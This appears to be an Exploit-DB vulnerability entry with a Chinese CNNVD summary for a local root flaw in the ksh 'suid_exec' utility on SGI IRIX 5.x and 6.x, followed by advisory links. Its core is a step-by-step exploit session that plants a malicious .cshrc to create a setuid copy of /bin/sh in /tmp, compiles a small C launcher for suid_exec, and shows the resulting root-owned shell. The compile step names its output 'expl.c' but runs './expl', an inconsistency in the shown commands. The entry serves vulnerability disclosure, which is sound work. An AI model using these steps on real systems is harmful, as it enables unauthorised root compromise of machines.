https://www.exploit-db.com/exploits/19353
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199804-011

IRIX6.x版本，或可能其他操作系统KornShell(ksh)上的suid_exec程序存在缓冲区溢出漏洞。本地用户可以利用该漏洞获得根权限。

source: http://www.securityfocus.com/bid/467/info

A vulnerability exists in the 'suid_exec' utility, as shipped by SGI with it's Irix operating system, versions 5.x and 6.x. Suid_exec is part of the Korn shell package, and was originally the mechanism by which ksh executed setuid shell scripts safely. However, it runs using the default shell, and as such will run the configuration files for the shell, such as a .cshrc. By placing malicious code in a .cshrc, and properly running suid_exec, commands can be executed as root. 


% setenv | grep SHELL
SHELL=/bin/tcsh
% mv ~/.cshrc ~/.cshrc.old
% cat > ~/.cshrc
cp /bin/sh /tmp
chmod a+rsx /tmp/sh
^D
% cat > expl.c
main()
{
execl("/sbin/suid_exec","/bin/su","/bin/su",0);
}
^D
% cc expl.c -o expl.c
% ./expl
Too many ('s.
% ls -l /tmp/sh
-r-sr-sr-x 1 root sys 140784 Dec 2 19:21 /tmp/sh*

来源:XF
名称:ksh-suid_exec(2100)
链接:http://xforce.iss.net/static/2100.php
来源:BID
名称:467
链接:http://www.securityfocus.com/bid/467
来源:CIAC
名称:H-15A
链接:http://ciac.llnl.gov/ciac/bulletins/h-15a.shtml
来源:SGI
名称:19980405-01-I
链接:ftp://patches.sgi.com/support/free/security/advisories/19980405-01-I
来源:AUSCERT
名称:AA-96.17
链接:ftp://ftp.auscert.org.au/pub/auscert/advisory/AA-96.17.suid_exec.vul